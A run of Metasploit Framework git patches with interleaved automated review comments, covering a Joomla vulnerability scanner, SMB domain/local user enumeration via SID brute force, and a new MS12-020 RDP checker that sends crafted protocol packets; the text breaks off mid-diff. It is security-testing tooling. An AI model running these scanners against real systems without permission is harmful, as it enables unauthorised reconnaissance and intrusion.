@@ -47,7 +52,7 @@ def initialize end - def run + def run_host(ip) connect_login @@ -55,7 +60,8 @@ def run res = send_cmd( ['XCRC', path, "0", "9999999999"], true ) if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./) - raise RuntimeError, "Unable to obtain file size! File probably doesn't exist." + print_error("Unable to obtain file size! File probably doesn't exist.") + return end file_size = $1.to_i From 16390e31c60a2c40151995f3e09b1c4d5de63c04 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 24 Jan 2013 15:48:04 -0600 Subject: [PATCH 154/421] Attempt to make travis useful again Lowers the history depth from the default of 100. --- .travis.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.travis.yml b/.travis.yml index 6411d11c2256..6b74b25154b0 100644 --- a/.travis.yml +++ b/.travis.yml @@ -6,3 +6,5 @@ rvm: notifications: irc: "irc.freenode.org#msfnotify" +git: + depth: 1 From dd1ce34ecc202d865f724984c7bb55f6ba17dbaa Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 17:04:22 -0500 Subject: [PATCH 155/421] Made recommended changes removed short timeout added returns and other small changes --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 49 ++++++++++--------- 1 file changed, 27 insertions(+), 22 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 1c465719f1a3..2ad9d2f040d9 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -23,7 +23,7 @@ def initialize 'Description' => %q{ This module scans a Joomla install for information, plugins and potential vulnerabilites. }, - 'Author' => [ 'f8lerror' ], + 'Author' => [ 'newpid0' ], 'License' => MSF_LICENSE ) register_options( 
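Review bot: The early `return` that replaces the `raise` in `run_host` leaves the FTP session opened by `connect_login` in place, since the only `disconnect` visible for this method sits at its end; now that the module runs once per host under the Scanner mixin, each target without the file may keep a socket open for the rest of the run. Call `disconnect` before the `return`, and name the host in the message so multi-host output can be attributed: `print_error("#{ip} - Unable to obtain file size! File probably doesn't exist.")`. `run_host` continues outside this hunk.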
@@ -101,22 +101,23 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] + vprint_status("#{peer} - Checking Joomla version") apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort break if app_status end - vprint_status("#{peer} - Checking host for interesting pages") + vprint_status("#{peer} - Checking for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking host for interesting plugins") + vprint_status("#{peer} - Checking for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return false if not bres or not bres.body or not bres.code + return if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp @@ -129,10 +130,9 @@ def check_app(tpath, app, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << app, 'method' => 'GET', - }, 5) + }) return :abort if res.nil? - return false if not res or not res.body or not res.code - vprint_status("#{peer} - Checking host for version information") + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) @@ -151,7 +151,7 @@ def check_app(tpath, app, ip) :ntype => 'Joomla Version', :data => out ) - return :next_app + return true end elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) 
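Review bot: The baseline request in `run_host` still ends with `}, 5)` while this commit drops that short timeout from every other `send_request_cgi` call; `bres` is the response `plugin_search` compares sizes against, and a nil `bres` returns before any plugin is checked, so a slow host silently loses the whole plugin pass. Ending the call with `})` brings it in line with the rest of the change. In the same block, `File.open(datastore['PLUGINS'], 'rb').each_line` never closes the handle; the block form `File.open(datastore['PLUGINS'], 'rb') do |f| ... end` would.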
@@ -163,25 +163,26 @@ def check_app(tpath, app, ip) else vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end - + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def scan_pages(tpath, iapp, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << iapp, 'method' => 'GET', - }, 5) - return false if not res or not res.body or not res.code + }) + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) @@ -213,23 +214,25 @@ def scan_pages(tpath, iapp, ip) else vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ 'uri' => "#{tpath}" << papp, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size 
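Review bot: The three rescue clauses of `check_app` now return nil instead of `:abort`, but `run_host` still stops only on `app_status == :abort`, so after an SSL or connection error the version loop keeps requesting every remaining path from a host that is not answering. Keeping `return :abort` in these clauses preserves the early exit; the same edit in the `scan_pages` and `plugin_search` hunks is harmless because their callers ignore the return value. The clause that lists `::ArgumentError` next to the connection errors also reports a coding mistake as "Unable to Connect", which makes a broken check look like an unreachable target.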
@@ -279,18 +282,20 @@ def plugin_search(tpath, papp, ip, bres) vprint_status("#{ip} requires a SSL client certificate") else vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end + end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end From 27aae87c1884740bbbb391fef9fc8960bf6652d2 Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Thu, 24 Jan 2013 22:06:51 -0500 Subject: [PATCH 156/421] Stop aggravating default show screenshot A better fix would have it detect default browsers as being text only like lynx. But this has got to go one way or another. Loosing shell because I forgot to do -v false is wall punch worthy --- .../post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 37386cad6639..6c4bd90f17f8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -129,7 +129,7 @@ def cmd_uictl(*args) def cmd_screenshot( *args ) path = Rex::Text.rand_text_alpha(8) + ".jpeg" quality = 50 - view = true + view = false screenshot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], From a9821fce290c5311a3e8b74b34d6df7044cff02c Mon Sep 17 00:00:00 2001 
From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:08:30 -0500 Subject: [PATCH 157/421] add action option for domain user enum --- .../auxiliary/scanner/smb/smb_lookupsid.rb | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 8ffe83a4bbb1..44fdf478d0b3 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -27,14 +27,21 @@ def initialize 'Description' => 'Determine what local users exist via brute force SID lookups', 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'DefaultOptions' => { - 'DCERPC::fake_bind_multi' => false - } + 'DefaultOptions' => + { + 'DCERPC::fake_bind_multi' => false + }, + 'Actions' => + [ + ['LOCAL', { 'Description' => 'Enumerate local accounts' } ], + ['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ] + ], + 'DefaultAction' => 'LOCAL' ) register_options( [ - OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) + OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]), ], self.class ) @@ -206,6 +213,8 @@ def run_host(ip) :groups => {} } + target_sid = host_sid if action.name =~ /LOCAL/i + target_sid = domain_sid if action.name =~ /DOMAIN/i # Brute force through a common RID range 500.upto(datastore['MaxRID'].to_i) do |rid| @@ -216,7 +225,7 @@ def run_host(ip) NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(host_sid) + + smb_pack_sid(target_side) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + From 976e59954c7d4403bbae176e88e9a3a72073796e Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:14:42 -0500 Subject: [PATCH 158/421] update description --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) 
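Review bot: `target_sid` in `run_host` is picked with two unanchored matches, `action.name =~ /LOCAL/i` and `action.name =~ /DOMAIN/i`, and is left nil when neither matches; it is presumably also nil when `domain_sid` could not be obtained (its assignment is outside the hunk, so confirm), and the RID loop then hands nil to `smb_pack_sid` for every request. Choose with an exact comparison, `target_sid = action.name.casecmp('DOMAIN').zero? ? domain_sid : host_sid`, and stop with a `print_error` and `return` when `target_sid` is nil so the failure is reported once instead of per RID. `run_host` starts and ends outside this hunk.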
diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 44fdf478d0b3..9a7c83fa4c18 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -24,7 +24,9 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Description' => 'Determine what local users exist via brute force SID lookups', + 'Description' => 'Determine what users exist via brute force SID lookups. + This module can enumerate both local and domain accounts by setting + ACTION to either LOCAL or DOMAIN', 'Author' => 'hdm', 'License' => MSF_LICENSE, 'DefaultOptions' => From a204f6fd1b493f859478f082cf077bcff6013f30 Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:18:20 -0500 Subject: [PATCH 159/421] variable typo --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 9a7c83fa4c18..28b431e5a8e1 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -227,7 +227,7 @@ def run_host(ip) NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(target_side) + + smb_pack_sid(target_sid) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + From e32bd8d4e0e19493c461f0c71f00798de2ddd901 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 11:44:08 +0100 Subject: [PATCH 160/421] Comma deleted --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 28b431e5a8e1..346f6f04ac5d 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb 
+++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -43,7 +43,7 @@ def initialize register_options( [ - OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]), + OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class ) From a081389f866676aa92450eba257ab62d5928e938 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 29 Jan 2013 03:08:53 +0200 Subject: [PATCH 161/421] Auxiliary::Web, Exploit::Remote::Web: style updates --- lib/msf/core/auxiliary/web.rb | 6 +++--- lib/msf/core/exploit/web.rb | 3 ++- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index a707e6a4ae1b..48428b720c40 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -250,9 +250,9 @@ def process_vulnerability( element, proof, opts = {} ) if !(payload = opts[:payload]) if payloads - payload = payloads. - select { |p| element.altered_value.include?( p ) }. - sort_by { |p| p.size }.last + payload = payloads.select { |p| + element.altered_value.include?( p ) + }.sort_by { |p| p.size }.last end end diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index df77fa4c366d..6abef6977360 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -75,7 +75,8 @@ def check def exploit print_status "Sending HTTP request for #{path}" - if res = perform_request + res = perform_request + if res print_status "The server responded with HTTP status code #{res.code}." else print_status 'The server did not respond to our request.' From 2965fa480e0606d620eb5ca1db8ec624c64edbda Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 25 Jan 2013 05:41:28 -0600 Subject: [PATCH 162/421] Some errant spaces --- lib/msf/core/exploit/web.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index 6abef6977360..dcec407024b9 100644 
--- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -78,11 +78,11 @@ def exploit res = perform_request if res print_status "The server responded with HTTP status code #{res.code}." - else - print_status 'The server did not respond to our request.' + else + print_status 'The server did not respond to our request.' end handler - end + end def tries 1 From fc3d87ed4cdeadd1e43c94d6a743e1a1f1c3ded2 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 10:43:43 -0600 Subject: [PATCH 163/421] added ms12-020 checker --- .../auxiliary/scanner/rdp/ms12-02_check.rb | 194 ++++++++++++++++++ 1 file changed, 194 insertions(+) create mode 100644 modules/auxiliary/scanner/rdp/ms12-02_check.rb diff --git a/modules/auxiliary/scanner/rdp/ms12-02_check.rb b/modules/auxiliary/scanner/rdp/ms12-02_check.rb new file mode 100644 index 000000000000..da7d4589624d --- /dev/null +++ b/modules/auxiliary/scanner/rdp/ms12-02_check.rb 
@@ -0,0 +1,194 @@ + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MS12-020 Microsoft Remote Desktop Checker', + 'Description' => %q{ + This module checks a range of hosts for the MS12-020 vulnerability. + This does not cause a DoS on the target. + }, + 'References' => + [ + [ 'CVE', '2012-0002' ], + [ 'MSB', 'MS12-020' ], + [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ], + [ 'EDB', '18606' ], + [ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ] + ], + 'Author' => + [ + 'Royce Davis @R3dy_ <rdavis[at]accuvant.com>', + 'Brandon McCann @zeknox <bmccann[at]accuvant.com>' + ], + 'License' => MSF_LICENSE, + )) + + register_options( + [ + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]), + ], self.class) + end + + def checkRdp(packet) + # code to check if RDP is open or not + vprint_status("#{peer} - Verifying RDP Protocol") + begin + # send connection + sock.put(packet) + # read packet to see if its rdp + res = sock.recv(1024) + + if res.unpack("H*").join == "0300000b06d00000123400" + return true + else + return false + end + rescue + print_error("could not connect to RHOST") + return false + end + end + + def connectionRequest() + packet = '' + + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options + return packet + end + + def report_goods + report_vuln( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'The MS12-020 Checker', + :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', + :refs => self.references, + :exploited_at => Time.now.utc + ) + end + + def connectInitial() 
+ packet = '' + + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData + return packet + end + + def userRequest() + packet = '' + + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents + return packet + end + + def channelRequestOne + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + return packet + end + + def channelRequestTwo + packet = '' + + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" + return packet + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + begin + # open connection + connect() + rescue + return + end + + # check if rdp is open + if checkRdp(connectionRequest) + + # send connectInitial + sock.put(connectInitial) + # send userRequest + 
sock.put(userRequest) + user1_res = sock.recv(1024) + # send 2nd userRequest + sock.put(userRequest) + user2_res = sock.recv(1024) + # send channel request one + sock.put(channelRequestOne) + channel_one_res = sock.recv(1024) + if channel_one_res.unpack("H*").to_s[16..19] == '3e00' + # vulnerable + print_good("#{peer} - Vulnerable MS12-020") + report_goods + + # send ChannelRequestTwo - prevent bsod + sock.put(channelRequestTwo) + + # report to the database + else + vprint_error("#{peer} - Not Vulnerable") + end + + end + # close connection + disconnect() + end + +end + From 8578e7cf8541cee0bf542fcf5a07c5d3ccc7ec73 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 11:55:54 -0600 Subject: [PATCH 164/421] renamed file --- .../auxiliary/scanner/rdp/{ms12-02_check.rb => ms12-020_check.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/rdp/{ms12-02_check.rb => ms12-020_check.rb} (100%) diff --git a/modules/auxiliary/scanner/rdp/ms12-02_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb similarity index 100% rename from modules/auxiliary/scanner/rdp/ms12-02_check.rb rename to modules/auxiliary/scanner/rdp/ms12-020_check.rb From 3742fd5a17c909303c76162c71468b4083017b74 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 11:58:04 -0600 Subject: [PATCH 165/421] duplicate include --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index da7d4589624d..5e2aa8dcc42a 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -4,7 +4,6 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
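Review bot: The vulnerable/not-vulnerable decision in `run_host` reads `channel_one_res.unpack("H*").to_s[16..19]`, and `unpack` returns an Array, so which characters land at 16..19 depends on how the interpreter renders `Array#to_s` (Ruby 1.9 and later include the brackets and quotes); `checkRdp` uses `.join` for the same job, so take the string with `.first` and confirm the offset against the bytes the check is meant to read. `sock.recv` may also return nil or raise, and with `disconnect()` only on the last line a failure mid-exchange leaves the socket open, while the bare `rescue` clauses hide the reason. In `report_goods`, `:exploited_at` is set although the description says the module only checks, and the message text reads "Confirmaiton". A sketch of the reworked `run_host` follows.

```ruby
def run_host(ip)
  begin
    connect
  rescue ::Rex::ConnectionError
    vprint_error("#{peer} - Unable to connect")
    return
  end

  begin
    return unless checkRdp(connectionRequest)
    # … unchanged: connectInitial, both userRequest exchanges, channelRequestOne …
    channel_one_res = sock.recv(1024)
    # String#unpack returns an Array; take the hex string itself so the
    # offsets do not depend on Array#to_s formatting.
    hex = channel_one_res.to_s.unpack("H*").first
    # NOTE(review): confirm 16..19 is the intended offset once .first is used
    if hex[16..19] == '3e00'
      # … unchanged: print_good, report_goods, channelRequestTwo …
    else
      vprint_error("#{peer} - Not Vulnerable")
    end
  rescue ::Rex::ConnectionError, ::Timeout::Error, ::EOFError => e
    vprint_error("#{peer} - #{e.class}: #{e.message}")
  ensure
    # Always release the socket, including on a failed exchange.
    disconnect
  end
end
```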
From 4824d11ff37e1e89e02c9c270d4ae1c70229d1a7 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 12:14:41 -0600 Subject: [PATCH 166/421] removed white space --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 5e2aa8dcc42a..cd991f7005a0 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -1,5 +1,3 @@ - - require 'msf/core' class Metasploit3 < Msf::Auxiliary From 7d4e7676ced690dd1851070e22e01edc103b0ded Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:04:20 -0600 Subject: [PATCH 167/421] This file has a MSF license, needs the header --- modules/auxiliary/scanner/rdp/ms12-020_check.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index cd991f7005a0..5d3ef5185954 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -1,3 +1,10 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -31,7 +38,7 @@ def initialize(info = {}) register_options( [ - OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]), + OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ]) ], self.class) end From 0a4fadcb098d2eadc7a646bb8be101b91ee8a4c2 Mon Sep 17 00:00:00 2001 
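Review bot: The line this hunk touches, `OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])`, gives an integer option a string default and re-declares an option that the `Msf::Exploit::Remote::Tcp` mixin already registers. `Opt::RPORT(3389)` is the usual form and keeps the default an integer. `initialize` starts outside this hunk.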
From: sinn3r <msfsinn3r@gmail.com> Date: Fri, 25 Jan 2013 13:07:13 -0600 Subject: [PATCH 168/421] Comments don't seem to align properly w/ tabs --- .../auxiliary/scanner/rdp/ms12-020_check.rb | 92 +++++++++---------- 1 file changed, 46 insertions(+), 46 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 5d3ef5185954..93dc4bc58ab8 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -64,13 +64,13 @@ def checkRdp(packet) def connectionRequest() packet = '' + - "\x03\x00" + # TPKT Header version 03, reserved 0 - "\x00\x0b" + # Length - "\x06" + # X.224 Data TPDU length - "\xe0" + # X.224 Type (Connection request) - "\x00\x00" + # dst reference - "\x00\x00" + # src reference - "\x00" # class and options + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options return packet end 
@@ -88,49 +88,49 @@ def report_goods def connectInitial() packet = '' + - "\x03\x00\x00\x65" + # TPKT Header - "\x02\xf0\x80" + # Data TPDU, EOT - "\x7f\x65\x5b" + # Connect-Initial - "\x04\x01\x01" + # callingDomainSelector - "\x04\x01\x01" + # callingDomainSelector - "\x01\x01\xff" + # upwardFlag - "\x30\x19" + # targetParams + size - "\x02\x01\x22" + # maxChannelIds - "\x02\x01\x20" + # maxUserIds - "\x02\x01\x00" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x18" + # minParams + size - "\x02\x01\x01" + # maxChannelIds - "\x02\x01\x01" + # maxUserIds - "\x02\x01\x01" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x01\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x19" + # maxParams + size - "\x02\x01\xff" + # maxChannelIds - "\x02\x01\xff" + # maxUserIds - "\x02\x01\xff" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x04\x00" # userData + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # 
